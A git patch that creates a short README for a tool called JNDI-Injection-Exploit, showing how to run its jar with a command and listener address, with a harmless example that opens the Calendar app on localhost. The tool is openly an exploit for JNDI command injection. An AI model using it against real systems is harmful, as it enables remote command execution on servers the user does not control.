From 46bfbcc727bed20ba80a3b0438518361187b6934 Mon Sep 17 00:00:00 2001 From: sayers522 Date: Sat, 27 Jun 2020 17:49:20 +0800 Subject: [PATCH] Create README.md --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..cde4006 --- /dev/null +++ b/README.md @@ -0,0 +1,11 @@ +# JNDI-Injection-Exploit +JNDI命令注入利用 + +## Usage: +``` +java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] +``` +## Example: +``` +java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calendar.app" -A 127.0.0.1 +```